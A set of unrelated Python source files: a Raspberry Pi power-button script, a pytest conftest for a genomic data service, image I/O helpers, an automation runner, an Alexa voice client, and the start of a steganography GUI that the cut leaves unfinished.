GPIO.setup(resetPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(ledPin, GPIO.OUT)
GPIO.setup(powerenPin, GPIO.OUT)
GPIO.output(powerenPin, GPIO.HIGH)
#waits for user to hold button up to 1 second before issuing poweroff command
def poweroff():
while True:
GPIO.wait_for_edge(powerPin, GPIO.FALLING)
output = int(subprocess.check_output(['batocera-es-swissknife', '--espid']))
if output:
os.system("batocera-es-swissknife --shutdown")
else:
os.system("shutdown -h now")
#blinks the LED to signal button being pushed
def ledBlink():
while True:
GPIO.output(ledPin, GPIO.HIGH)
GPIO.wait_for_edge(powerPin, GPIO.FALLING)
start = time.time()
while GPIO.input(powerPin) == GPIO.LOW:
GPIO.output(ledPin, GPIO.LOW)
time.sleep(0.2)
GPIO.output(ledPin, GPIO.HIGH)
time.sleep(0.2)
#resets the pi
def reset():
while True:
GPIO.wait_for_edge(resetPin, GPIO.FALLING)
output = int(subprocess.check_output(['batocera-es-swissknife', '--espid']))
output_rc = int(subprocess.check_output(['batocera-es-swissknife', '--emupid']))
if output_rc:
os.system("batocera-es-swissknife --emukill")
elif output:
os.system("batocera-es-swissknife --restart")
else:
os.system("shutdown -r now")
if __name__ == "__main__":
#initialize GPIO settings
init()
#create a multiprocessing.Process instance for each function to enable parallelism
powerProcess = Process(target = poweroff)
powerProcess.start()
ledProcess = Process(target = ledBlink)
ledProcess.start()
resetProcess = Process(target = reset)
resetProcess.start()
powerProcess.join()
ledProcess.join()
resetProcess.join()
GPIO.cleanup()
|
conftest.py | import os
import json
from multiprocessing import Process
from indexd import default_settings, get_app as get_indexd_app
from indexclient.client import IndexClient
import pytest
import requests
import requests_mock
from mock import patch
from psqlgraph import PsqlGraphDriver
from dictionaryutils import DataDictionary, dictionary
from datamodelutils import models, validators
from gen3authz.client.arborist.client import ArboristClient
from sheepdog.test_settings import (
INDEX_CLIENT,
)
from tests import utils
from tests.integration.datadict.api import app as _app, app_init, indexd_init
from tests.integration.datadict.submission.test_endpoints import put_cgci_blgsp
import importlib
def get_parent(path):
print(path)
return path[0 : path.rfind("/")]
PATH_TO_SCHEMA_DIR = (
get_parent(os.path.abspath(os.path.join(os.path.realpath(__file__), os.pardir)))
+ "/datadict/schemas"
)
# update these settings if you want to point to another db
def pg_config(use_ssl=False, isolation_level=None):
test_host = (
"localhost:" + str(os.environ.get("PGPORT"))
if os.environ.get("PGPORT") is not None
else "localhost"
)
test_user = "test"
test_pass = "test" # nosec
test_db = "sheepdog_automated_test"
ret_val = dict(host=test_host, user=test_user, password=test_pass, database=test_db)
# set sslmode if it's given, otherwise use the default
if use_ssl:
connect_args = {}
connect_args["sslmode"] = "require"
ret_val["connect_args"] = connect_args
# set isolation_level if it's given, otherwise use the default
if isolation_level:
ret_val["isolation_level"] = isolation_level
return ret_val
@pytest.fixture
def require_index_exists_on(app, monkeypatch):
monkeypatch.setitem(app.config, "REQUIRE_FILE_INDEX_EXISTS", True)
@pytest.fixture
def require_index_exists_off(app, monkeypatch):
monkeypatch.setitem(app.config, "REQUIRE_FILE_INDEX_EXISTS", False)
def wait_for_indexd_alive(port):
url = "http://localhost:{}/_status".format(port)
try:
requests.get(url)
except requests.ConnectionError:
return wait_for_indexd_alive(port)
else:
return
def wait_for_indexd_not_alive(port):
url = "http://localhost:{}/_status".format(port)
try:
requests.get(url)
except requests.ConnectionError:
return
else:
return wait_for_indexd_not_alive(port)
@pytest.fixture
def app(tmpdir, request):
port = 8000
dictionary_setup(_app)
# this is to make sure sqlite is initialized
# for every unit test
importlib.reload(default_settings)
# fresh files before running
for filename in ["auth.sq3", "index.sq3", "alias.sq3"]:
if os.path.exists(filename):
os.remove(filename)
indexd_app = get_indexd_app()
indexd_init(*INDEX_CLIENT["auth"])
indexd = Process(target=indexd_app.run, args=["localhost", port])
indexd.start()
wait_for_indexd_alive(port)
gencode_json = tmpdir.mkdir("slicing").join("test_gencode.json")
gencode_json.write(
json.dumps(
{
"a_gene": ["chr1", None, 200],
"b_gene": ["chr1", 150, 300],
"c_gene": ["chr1", 200, None],
"d_gene": ["chr1", None, None],
}
)
)
def teardown():
for filename in ["auth.sq3", "index.sq3", "alias.sq3"]:
if os.path.exists(filename):
os.remove(filename)
indexd.terminate()
wait_for_indexd_not_alive(port)
_app.config.from_object("sheepdog.test_settings")
_app.config["PATH_TO_SCHEMA_DIR"] = PATH_TO_SCHEMA_DIR
request.addfinalizer(teardown)
app_init(_app)
_app.logger.setLevel(os.environ.get("GDC_LOG_LEVEL", "WARNING"))
_app.jwt_public_keys = {
_app.config["USER_API"]: {
"key-test": utils.read_file(
"./integration/resources/keys/test_public_key.pem"
)
}
}
_app.auth = ArboristClient()
return _app
@pytest.fixture(params=[False, True, None])
def use_ssl(request):
# return False, True, None
return request.param
@pytest.fixture(params=("READ_COMMITTED", "REPEATABLE_READ", "SERIALIZABLE", None))
def isolation_level(request):
# return 'READ_COMMITTED', 'REPEATABLE_READ', 'SERIALIZABLE', None
return request.param
@pytest.fixture
def pg_driver(request, client, use_ssl, isolation_level):
pg_driver = PsqlGraphDriver(
**pg_config(use_ssl=use_ssl, isolation_level=isolation_level)
)
def tearDown():
with pg_driver.engine.begin() as conn:
for table in models.Node().get_subclass_table_names():
if table != models.Node.__tablename__:
conn.execute("delete from {}".format(table)) # nosec
for table in models.Edge().get_subclass_table_names():
if table != models.Edge.__tablename__:
conn.execute("delete from {}".format(table)) # nosec
conn.execute("delete from versioned_nodes")
conn.execute("delete from _voided_nodes")
conn.execute("delete from _voided_edges")
conn.execute("delete from transaction_snapshots")
conn.execute("delete from transaction_documents")
conn.execute("delete from transaction_logs")
tearDown()
request.addfinalizer(tearDown)
return pg_driver
@pytest.fixture()
def cgci_blgsp(client, submitter):
put_cgci_blgsp(client, submitter)
@pytest.fixture()
def index_client():
return IndexClient(
INDEX_CLIENT["host"], INDEX_CLIENT["version"], INDEX_CLIENT["auth"]
)
def dictionary_setup(_app):
print("dictionary setup")
url = "s3://testurl"
session = requests.Session()
adapter = requests_mock.Adapter()
session.mount("s3", adapter)
json_dict = json.load(open(PATH_TO_SCHEMA_DIR + "/dictionary.json"))
adapter.register_uri("GET", url, json=json_dict, status_code=200)
resp = session.get(url)
with patch("requests.get") as get_mocked:
get_mocked.return_value = resp
datadictionary = DataDictionary(url=url)
dictionary.init(datadictionary)
from gdcdatamodel import models as md
from gdcdatamodel import validators as vd
models.init(md)
validators.init(vd)
|
utils.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import cv2
import os
import numpy as np
import threading
__all__ = [
'load_image',
'save_image',
'load_images',
'save_images',
]
def load_image(path):
'''Load an image
Parameters
----------
path : str
path of the image.
Returns : numpy.ndarray
-------
a numpy RGB image
Examples
----------
With TensorLayerX
>>> import tensorlayerx as tlx
>>> path = './data/1.png'
>>> image = tlx.vision.load_image(path)
>>> print(image)
'''
image = cv2.imread(path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
return image
def save_image(image, file_name, path):
'''Save an image
Parameters
----------
image : numpy.ndarray
The image to save
file_name : str
image name to save
path : str
path to save image
Examples
----------
With TensorLayerX
>>> import tensorlayerx as tlx
>>> load_path = './data/1.png'
>>> save_path = './test/'
>>> image = tlx.vision.load_image(path)
>>> tlx.vision.save_image(image, file_name='1.png',path=save_path)
'''
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
cv2.imwrite(os.path.join(path, file_name), image)
def load_images(path, n_threads = 10):
'''Load images from file
Parameters
----------
path : str
path of the images.
n_threads : int
The number of threads to read image.
Returns : list
-------
a list of numpy RGB images
Examples
----------
With TensorLayerX
>>> import tensorlayerx as tlx
>>> load_path = './data/'
>>> image = tlx.vision.load_images(path)
'''
images = []
files = sorted(os.listdir(path))
for file in range(0, len(files), n_threads):
image_list = files[file:file + n_threads]
image = threading_data(image_list, fn=load_image, path = path)
images.extend(image)
return images
def save_images(images, file_names, path):
'''Save images
Parameters
----------
images : list
a list of numpy RGB images
file_names : list
a list of image names to save
path : str
path to save images
Examples
----------
With TensorLayerX
>>> import tensorlayerx as tlx
>>> load_path = './data/'
>>> save_path = './test/'
>>> images = tlx.vision.load_images(path)
>>> name_list = user_define
>>> tlx.vision.save_images(images, file_names=name_list,path=save_path)
'''
if len(images) != len(file_names):
raise ValueError(" The number of images should be equal to the number of file names.")
for i in range(len(file_names)):
images[i] = cv2.cvtColor(images[i], cv2.COLOR_RGB2BGR)
cv2.imwrite(os.path.join(path, str(file_names[i])), images[i])
def threading_data(data=None, fn=None, thread_count=None, path = None):
"""Process a batch of data by given function by threading.
Usually be used for data augmentation.
Parameters
-----------
data : numpy.array or others
The data to be processed.
thread_count : int
The number of threads to use.
fn : function
The function for data processing.
more args : the args for `fn`
Ssee Examples below.
Returns
-------
list or numpyarray
The processed results.
References
----------
- `python queue <https://pymotw.com/2/Queue/index.html#module-Queue>`__
- `run with limited queue <http://effbot.org/librarybook/queue.htm>`__
"""
def apply_fn(results, i, data, path):
path = os.path.join(path, data)
results[i] = fn(path)
if thread_count is None:
results = [None] * len(data)
threads = []
# for i in range(len(data)):
# t = threading.Thread(name='threading_and_return', target=apply_fn, args=(results, i, data[i], kwargs))
for i, d in enumerate(data):
t = threading.Thread(name='threading_and_return', target=apply_fn, args=(results, i, d, path))
t.start()
threads.append(t)
else:
divs = np.linspace(0, len(data), thread_count + 1)
divs = np.round(divs).astype(int)
results = [None] * thread_count
threads = []
for i in range(thread_count):
t = threading.Thread(
name='threading_and_return', target=apply_fn, args=(results, i, data[divs[i]:divs[i + 1]], path)
)
t.start()
threads.append(t)
for t in threads:
t.join()
if thread_count is None:
try:
return np.asarray(results, dtype=object)
except Exception:
return results
else:
return np.concatenate(results) |
automation.py | # TODO: Trigger refresh on variable configuration update
# TODO: Watch multiple folders if not all under parent folder
# TODO: Consider whether to send partial updates for variables
# TODO: Precompile notebook scripts
import logging
import subprocess
from invisibleroads_macros_disk import is_path_in_folder, make_folder
from invisibleroads_macros_log import format_path
from logging import getLogger
from multiprocessing import Process, Queue, Value
from os import environ, getenv, listdir
from os.path import exists, isdir, join, realpath
from pyramid.config import Configurator
from time import time
from waitress import serve
from watchgod import watch
from ..constants import (
AUTOMATION_PATH,
DISK_DEBOUNCE_IN_MILLISECONDS,
DISK_POLL_IN_MILLISECONDS,
HOST,
MODE_NAMES,
PORT,
STREAMS_ROUTE)
from ..exceptions import (
CrossComputeConfigurationError,
CrossComputeError)
from ..macros.iterable import group_by
from ..macros.process import StoppableProcess
from ..routes.automation import AutomationRoutes
from ..routes.stream import StreamRoutes
from .configuration import (
get_automation_definitions,
get_display_configuration,
get_variable_definitions,
load_configuration)
from .variable import (
format_text,
get_variable_data_by_id,
save_variable_data)
class Automation():
@classmethod
def load(Class, path_or_folder=None):
instance = Class()
if isdir(path_or_folder):
instance.initialize_from_folder(path_or_folder)
else:
instance.initialize_from_path(path_or_folder)
return instance
def reload(self):
path = self.path
if exists(path):
self.initialize_from_path(path)
else:
self.initialize_from_folder(self.folder)
def initialize_from_folder(self, folder):
paths = listdir(folder)
if AUTOMATION_PATH in paths:
paths.remove(AUTOMATION_PATH)
paths.insert(0, AUTOMATION_PATH)
for relative_path in paths:
absolute_path = join(folder, relative_path)
if isdir(absolute_path):
continue
try:
self.initialize_from_path(absolute_path)
except CrossComputeConfigurationError:
raise
except CrossComputeError:
continue
break
else:
raise CrossComputeError('could not find configuration')
def initialize_from_path(self, path):
configuration = load_configuration(path)
self.path = path
self.folder = configuration['folder']
self.definitions = get_automation_definitions(configuration)
self._file_type_by_path = self._get_file_type_by_path()
self._timestamp_object = Value('d', time())
L.debug('configuration_path = %s', path)
def serve(
self,
host=HOST,
port=PORT,
is_static=False,
is_production=False,
disk_poll_in_milliseconds=DISK_POLL_IN_MILLISECONDS,
disk_debounce_in_milliseconds=DISK_DEBOUNCE_IN_MILLISECONDS,
base_uri='',
automation_queue=None):
if automation_queue is None:
automation_queue = Queue()
if getLogger().level > logging.DEBUG:
getLogger('waitress').setLevel(logging.ERROR)
getLogger('watchgod.watcher').setLevel(logging.ERROR)
def run_server():
L.info('starting worker')
worker_process = Process(target=self.work, args=(
automation_queue,))
worker_process.daemon = True
worker_process.start()
L.info('serving at http://%s:%s%s', host, port, base_uri)
# TODO: Decouple from pyramid and waitress
app = self._get_app(
automation_queue, is_static, is_production, base_uri)
try:
serve(app, host=host, port=port, url_prefix=base_uri)
except OSError as e:
L.error(e)
if is_static and is_production:
run_server()
return
self.watch(
run_server, disk_poll_in_milliseconds,
disk_debounce_in_milliseconds)
def run(self):
for automation_definition in self.definitions:
for batch_definition in automation_definition.get('batches', []):
run_automation(automation_definition, batch_definition)
def work(self, automation_queue):
try:
while automation_pack := automation_queue.get():
run_automation(*automation_pack)
except KeyboardInterrupt:
pass
def watch(
self, run_server, disk_poll_in_milliseconds,
disk_debounce_in_milliseconds):
server_process = StoppableProcess(target=run_server)
server_process.start()
for changes in watch(
self.folder, min_sleep=disk_poll_in_milliseconds,
debounce=disk_debounce_in_milliseconds):
for changed_type, changed_path in changes:
try:
file_type = self._get_file_type(changed_path)
except KeyError:
continue
L.debug('%s %s %s', changed_type, changed_path, file_type)
if file_type == 'c':
try:
self.reload()
except CrossComputeError as e:
L.error(e)
continue
server_process.stop()
server_process = StoppableProcess(target=run_server)
server_process.start()
elif file_type == 's':
for d in self.definitions:
d['display'] = get_display_configuration(d)
self._timestamp_object.value = time()
else:
self._timestamp_object.value = time()
def _get_app(self, automation_queue, is_static, is_production, base_uri):
automation_routes = AutomationRoutes(
self.definitions, automation_queue, self._timestamp_object)
stream_routes = StreamRoutes(self._timestamp_object)
with Configurator() as config:
config.include('pyramid_jinja2')
config.include(automation_routes.includeme)
if not is_static:
config.include(stream_routes.includeme)
def update_renderer_globals():
renderer_environment = config.get_jinja2_environment()
renderer_environment.globals.update({
'BASE_JINJA2': 'base.jinja2',
'LIVE_JINJA2': 'live.jinja2',
'IS_STATIC': is_static,
'IS_PRODUCTION': is_production,
'BASE_URI': base_uri,
'STREAMS_ROUTE': STREAMS_ROUTE,
})
config.action(None, update_renderer_globals)
return config.make_wsgi_app()
def _get_file_type(self, path):
for automation_definition in self.definitions:
automation_folder = automation_definition['folder']
if is_path_in_folder(path, join(automation_folder, 'runs')):
return 'v'
return self._file_type_by_path[realpath(path)]
def _get_file_type_by_path(self):
'Set c = configuration, s = style, t = template, v = variable'
file_type_by_path = {}
def add(path, file_type):
file_type_by_path[realpath(path)] = file_type
for path in [self.path] + [_['path'] for _ in self.definitions]:
add(path, 'c')
for automation_definition in self.definitions:
folder = automation_definition['folder']
configuration = load_configuration(automation_definition['path'])
for batch_definition in configuration.get('batches', []):
batch_configuration = batch_definition.get('configuration', {})
if 'path' not in batch_configuration:
continue
add(join(folder, batch_configuration['path']), 'c')
for mode_name in MODE_NAMES:
mode_configuration = automation_definition.get(mode_name, {})
template_definitions = mode_configuration.get('templates', [])
for template_definition in template_definitions:
if 'path' not in template_definition:
continue
add(join(folder, template_definition['path']), 't')
for batch_definition in automation_definition.get('batches', []):
for path in self._get_paths_from_folder(join(
folder, batch_definition['folder'])):
add(path, 'v')
display_configuration = automation_definition.get('display', {})
for style_definition in display_configuration.get('styles', []):
if 'path' not in style_definition:
continue
add(join(folder, style_definition['path']), 's')
return file_type_by_path
def _get_paths_from_folder(self, folder):
paths = set()
for automation_definition in self.definitions:
for mode_name in MODE_NAMES:
mode_configuration = automation_definition.get(mode_name, {})
variable_definitions = mode_configuration.get('variables', [])
for variable_definition in variable_definitions:
variable_configuration = variable_definition.get(
'configuration', {})
if 'path' in variable_configuration:
paths.add(join(folder, variable_configuration['path']))
paths.add(join(folder, variable_definition['path']))
return paths
def run_automation(automation_definition, batch_definition):
script_definition = automation_definition.get('script', {})
command_string = script_definition.get('command')
if not command_string:
return
folder = automation_definition['folder']
batch_folder, custom_environment = prepare_batch(
automation_definition, batch_definition)
L.info(
'%s %s running %s', automation_definition['name'],
automation_definition['version'],
format_path(join(folder, batch_folder)))
mode_folder_by_name = {_ + '_folder': make_folder(join(
folder, batch_folder, _)) for _ in MODE_NAMES}
script_environment = {
'CROSSCOMPUTE_' + k.upper(): v for k, v in mode_folder_by_name.items()
} | {'PATH': getenv('PATH', '')} | custom_environment
L.debug('environment = %s', script_environment)
debug_folder = mode_folder_by_name['debug_folder']
o_path = join(debug_folder, 'stdout.txt')
e_path = join(debug_folder, 'stderr.txt')
try:
with open(o_path, 'wt') as o_file, open(e_path, 'wt') as e_file:
subprocess.run(
format_text(command_string, mode_folder_by_name), check=True,
shell=True, # Expand $HOME and ~
cwd=join(folder, script_definition.get('folder', '.')),
env=script_environment, stdout=o_file, stderr=e_file)
except OSError as e:
L.error(e)
except subprocess.CalledProcessError:
L.error(open(e_path, 'rt').read().rstrip())
def prepare_batch(automation_definition, batch_definition):
variable_definitions = get_variable_definitions(
automation_definition, 'input')
batch_folder = batch_definition['folder']
variable_definitions_by_path = group_by(variable_definitions, 'path')
data_by_id = batch_definition.get('data_by_id', {})
custom_environment = prepare_environment(
automation_definition,
variable_definitions_by_path.pop('ENVIRONMENT', []),
data_by_id)
if not data_by_id:
return batch_folder, custom_environment
automation_folder = automation_definition['folder']
input_folder = make_folder(join(automation_folder, batch_folder, 'input'))
for path, variable_definitions in variable_definitions_by_path.items():
input_path = join(input_folder, path)
save_variable_data(input_path, variable_definitions, data_by_id)
return batch_folder, custom_environment
def prepare_environment(
automation_definition, variable_definitions, data_by_id):
custom_environment = {}
data_by_id = data_by_id.copy()
try:
environment_variable_definitions = automation_definition.get(
'environment', {}).get('variables', [])
for variable_id in (_['id'] for _ in environment_variable_definitions):
custom_environment[variable_id] = environ[variable_id]
for variable_id in (_['id'] for _ in variable_definitions):
if variable_id in data_by_id:
continue
data_by_id[variable_id] = environ[variable_id]
except KeyError:
raise CrossComputeConfigurationError(
f'{variable_id} is missing in the environment')
return custom_environment | get_variable_data_by_id(
variable_definitions, data_by_id)
L = getLogger(__name__)
|
alexa.py | # -*- coding: utf-8 -*-
import base64
import cgi
import json
import logging
import os
import signal
import sys
import tempfile
import threading
import uuid
if sys.version_info < (3, 0):
import Queue as queue
else:
import queue
import requests
import datetime
import hyper
from avs.mic import Audio
from avs.interface.alerts import Alerts
from avs.interface.audio_player import AudioPlayer
from avs.interface.speaker import Speaker
from avs.interface.speech_recognizer import SpeechRecognizer
from avs.interface.speech_synthesizer import SpeechSynthesizer
from avs.interface.system import System
import avs.config
import avs.auth
import requests
logger = logging.getLogger(__name__)
class AlexaStateListener(object):
ENDPOINT = "https://alexaapi.compositegrid.com/api/v1/speechLogs?text="
def __init__(self):
pass
def on_ready(self):
requests.post(self.ENDPOINT + "Idle")
logger.info('on_ready')
def on_disconnected(self):
logger.info('on_disconnected')
def on_listening(self):
logger.info('on_listening')
def on_thinking(self):
logger.info('on_thinking')
def on_speaking(self):
requests.post(self.ENDPOINT + "Speaking")
logger.info('on_speaking')
def on_finished(self):
requests.post(self.ENDPOINT + "Idle")
logger.info('on_finished')
class Alexa(object):
API_VERSION = 'v20160207'
def __init__(self, config=None):
self.event_queue = queue.Queue()
self.SpeechRecognizer = SpeechRecognizer(self)
self.SpeechSynthesizer = SpeechSynthesizer(self)
self.AudioPlayer = AudioPlayer(self)
self.Speaker = Speaker(self)
self.Alerts = Alerts(self)
self.System = System(self)
self.state_listener = AlexaStateListener()
# put() will send audio to speech recognizer
self.put = self.SpeechRecognizer.put
# listen() will trigger SpeechRecognizer's Recognize event
self.listen = self.SpeechRecognizer.Recognize
self.done = False
self.requests = requests.Session()
self._configfile = config
self._config = avs.config.load(configfile=config)
self.last_activity = datetime.datetime.utcnow()
self._ping_time = None
def set_state_listener(self, listner):
self.state_listener = listner
def start(self):
self.done = False
t = threading.Thread(target=self.run)
t.daemon = True
t.start()
def stop(self):
self.done = True
def send_event(self, event, listener=None, attachment=None):
self.event_queue.put((event, listener, attachment))
def run(self):
while not self.done:
try:
self._run()
except AttributeError as e:
logger.exception(e)
continue
except hyper.http20.exceptions.StreamResetError as e:
logger.exception(e)
continue
except ValueError as e:
logging.exception(e)
# failed to get an access token, exit
sys.exit(1)
except Exception as e:
logging.exception(e)
continue
def _run(self):
conn = hyper.HTTP20Connection('{}:443'.format(
self._config['host_url']), force_proto='h2')
headers = {'authorization': 'Bearer {}'.format(self.token)}
if 'dueros-device-id' in self._config:
headers['dueros-device-id'] = self._config['dueros-device-id']
downchannel_id = conn.request(
'GET', '/{}/directives'.format(self._config['api']), headers=headers)
downchannel_response = conn.get_response(downchannel_id)
if downchannel_response.status != 200:
raise ValueError(
"/directive requests returned {}".format(downchannel_response.status))
_, pdict = cgi.parse_header(
downchannel_response.headers['content-type'][0].decode('utf-8'))
downchannel_boundary = '--{}'.format(pdict['boundary']).encode('utf-8')
downchannel = conn.streams[downchannel_id]
downchannel_buffer = b''
eventchannel_boundary = 'seeed-voice-engine'
# ping every 5 minutes (60 seconds early for latency) to maintain the connection
self._ping_time = datetime.datetime.utcnow() + datetime.timedelta(seconds=240)
self.event_queue.queue.clear()
self.System.SynchronizeState()
while not self.done:
try:
event, listener, attachment = self.event_queue.get(
timeout=0.25)
except queue.Empty:
event = None
# we want to avoid blocking if the data wasn't for stream downchannel
while conn._sock.can_read:
conn._single_read()
while downchannel.data:
framebytes = downchannel._read_one_frame()
downchannel_buffer = self._parse_response(
framebytes, downchannel_boundary, downchannel_buffer
)
if event is None:
self._ping(conn)
self.System.UserInactivityReport()
continue
headers = {
':method': 'POST',
':scheme': 'https',
':path': '/{}/events'.format(self._config['api']),
'authorization': 'Bearer {}'.format(self.token),
'content-type': 'multipart/form-data; boundary={}'.format(eventchannel_boundary)
}
if 'dueros-device-id' in self._config:
headers['dueros-device-id'] = self._config['dueros-device-id']
stream_id = conn.putrequest(headers[':method'], headers[':path'])
default_headers = (':method', ':scheme', ':authority', ':path')
for name, value in headers.items():
is_default = name in default_headers
conn.putheader(name, value, stream_id, replace=is_default)
conn.endheaders(final=False, stream_id=stream_id)
metadata = {
'context': self.context,
'event': event
}
# logger.info('metadata: {}'.format(json.dumps(metadata, indent=4)))
json_part = '--{}\r\n'.format(eventchannel_boundary)
json_part += 'Content-Disposition: form-data; name="metadata"\r\n'
json_part += 'Content-Type: application/json; charset=UTF-8\r\n\r\n'
json_part += json.dumps(metadata)
conn.send(json_part.encode('utf-8'),
final=False, stream_id=stream_id)
if attachment:
attachment_header = '\r\n--{}\r\n'.format(
eventchannel_boundary)
attachment_header += 'Content-Disposition: form-data; name="audio"\r\n'
attachment_header += 'Content-Type: application/octet-stream\r\n\r\n'
conn.send(attachment_header.encode('utf-8'),
final=False, stream_id=stream_id)
# AVS_AUDIO_CHUNK_PREFERENCE = 320
for chunk in attachment:
conn.send(chunk, final=False, stream_id=stream_id)
# check if StopCapture directive is received
while conn._sock.can_read:
conn._single_read()
while downchannel.data:
framebytes = downchannel._read_one_frame()
downchannel_buffer = self._parse_response(
framebytes, downchannel_boundary, downchannel_buffer
)
self.last_activity = datetime.datetime.utcnow()
end_part = '\r\n--{}--'.format(eventchannel_boundary)
conn.send(end_part.encode('utf-8'),
final=True, stream_id=stream_id)
logger.info("wait for response")
response = conn.get_response(stream_id)
logger.info("status code: %s", response.status)
if response.status == 200:
_, pdict = cgi.parse_header(
response.headers['content-type'][0].decode('utf-8'))
boundary = '--{}'.format(pdict['boundary']).encode('utf-8')
self._parse_response(response.read(), boundary)
elif response.status == 204:
pass
else:
logger.warning(response.headers)
logger.warning(response.read())
if listener and callable(listener):
listener()
def _parse_response(self, response, boundary, buffer=b''):
directives = []
blen = len(boundary)
response = buffer + response
while response:
pos = response.find(boundary)
if pos < 0:
break
# skip small data block
if pos > blen:
# a blank line is between parts
parts = response[:pos - 2].split(b'\r\n\r\n', 1)
if parts[0].find(b'application/json') >= 0:
metadata = json.loads(parts[1].decode('utf-8'))
if 'directive' in metadata:
directives.append(metadata['directive'])
elif parts[0].find(b'application/octet-stream') >= 0:
for line in parts[0].splitlines():
name, value = line.split(b':', 1)
if name.lower() == b'content-id':
content_id = value.strip()[1:-1]
filename = base64.urlsafe_b64encode(content_id)[:8].decode('utf-8')
with open(os.path.join(tempfile.gettempdir(), '{}.mp3'.format(filename)), 'wb') as f:
f.write(parts[1])
logger.info('write audio to {}.mp3'.format(filename))
break
response = response[pos + blen + 2:]
for directive in directives:
self._handle_directive(directive)
return response
def _handle_directive(self, directive):
logger.info(json.dumps(directive, indent=4))
try:
namespace = directive['header']['namespace']
name = directive['header']['name']
if hasattr(self, namespace):
interface = getattr(self, namespace)
directive_func = getattr(interface, name, None)
if directive_func:
directive_func(directive)
else:
logger.info(
'{}.{} is not implemented yet'.format(namespace, name))
else:
logger.info('{} is not implemented yet'.format(namespace))
except KeyError as e:
logger.exception(e)
except Exception as e:
logger.exception(e)
def _ping(self, connection):
if datetime.datetime.utcnow() >= self._ping_time:
connection.ping(uuid.uuid4().hex[:8])
logger.debug('ping at {}'.format(
datetime.datetime.utcnow().strftime("%a %b %d %H:%M:%S %Y")))
# ping every 5 minutes (60 seconds early for latency) to maintain the connection
self._ping_time = datetime.datetime.utcnow() + datetime.timedelta(seconds=240)
@property
def context(self):
# return [self.SpeechRecognizer.context, self.SpeechSynthesizer.context,
# self.AudioPlayer.context, self.Speaker.context, self.Alerts.context]
return [self.SpeechSynthesizer.context, self.Speaker.context, self.AudioPlayer.context, self.Alerts.context]
@property
def token(self):
date_format = "%a %b %d %H:%M:%S %Y"
if 'access_token' in self._config:
if 'expiry' in self._config:
expiry = datetime.datetime.strptime(
self._config['expiry'], date_format)
# refresh 60 seconds early to avoid chance of using expired access_token
if (datetime.datetime.utcnow() - expiry) > datetime.timedelta(seconds=60):
logger.info("Refreshing access_token")
else:
return self._config['access_token']
payload = {
'client_id': self._config['client_id'],
'client_secret': self._config['client_secret'],
'grant_type': 'refresh_token',
'refresh_token': self._config['refresh_token']
}
response = None
# try to request an access token 3 times
for _ in range(3):
try:
response = self.requests.post(
self._config['refresh_url'], data=payload)
if response.status_code != 200:
logger.warning(response.text)
else:
break
except Exception as e:
logger.exception(e)
continue
if (response is None) or (not hasattr(response, 'status_code')) or response.status_code != 200:
raise ValueError(
"refresh token request returned {}".format(response.status))
config = response.json()
self._config['access_token'] = config['access_token']
expiry_time = datetime.datetime.utcnow(
) + datetime.timedelta(seconds=config['expires_in'])
self._config['expiry'] = expiry_time.strftime(date_format)
logger.debug(json.dumps(self._config, indent=4))
avs.config.save(self._config, configfile=self._configfile)
return self._config['access_token']
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
def main():
logging.basicConfig(level=logging.INFO)
config = avs.config.DEFAULT_CONFIG_FILE if len(sys.argv) < 2 else sys.argv[1]
if not os.path.isfile(config):
print('Login amazon alexa or baidu dueros first')
avs.auth.auth(None, config)
audio = Audio()
alexa = Alexa(config)
audio.link(alexa)
alexa.start()
audio.start()
is_quit = threading.Event()
def signal_handler(sig, frame):
print('Quit')
is_quit.set()
signal.signal(signal.SIGINT, signal_handler)
while True:
try:
input('press ENTER to talk\n')
except SyntaxError:
pass
except NameError:
pass
if is_quit.is_set():
break
alexa.listen()
alexa.stop()
audio.stop()
if __name__ == '__main__':
main()
|
main.py | # ============================================================================================
# MIT License
# Copyright (c) 2020 Konstantinos Bourantas
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ============================================================================================
import lsbSteg
import tkinter as tk
import tkinter.ttk as ttk
from tkinter.filedialog import askdirectory
from tkinter import filedialog
import threading
from ttkthemes import ThemedTk
import sys
import pyfiglet
from PIL import ImageTk, Image
# ============================================================================================
class pyHide:
def __init__(self, root, image=None):
root.minsize(700, 700)
root.title('PyHide')
# icon made by : https://www.flaticon.com/authors/becris
ico = Image.open('icon.png')
photo = ImageTk.PhotoImage(ico)
root.wm_iconphoto(False, photo)
self.checkboxExport = None
self.exportOpt = 0
self.imagePath = None
self.root = root
self.frame = ttk.Frame(root)
self.frame.grid(row=0, column=1, rowspan=5, pady=30, padx=10)
# -----------------------------------------------
self.dirLabel = ttk.Label(self.frame, font=25, text="Image Path:")
self.dirLabel.grid(row=0, column=0, sticky=tk.W)
self.imagePathEntry = ttk.Entry(self.frame, font=40, width="50")
self.imagePathEntry.grid(row=0, column=1)
self.passLabel = ttk.Label(self.frame, font=25, text="Password:")
self.passLabel.grid(row=1, column=0, sticky=tk.W)
self.passwordEntry = ttk.Entry(
self.frame, show="*", font=40, width="50")
self.passwordEntry.grid(row=1, column=1)
self.btnChooseDir = ttk.Button(self.frame, text="Open", width=8,
command=lambda: self.selectImage())
self.btnChooseDir.grid(row=0, column=2)
# --------------------------------------------------------------------------------------------
# radio buttons
self.radioOption = tk.StringVar(value="")
self.radioEncode = ttk.Radiobutton(
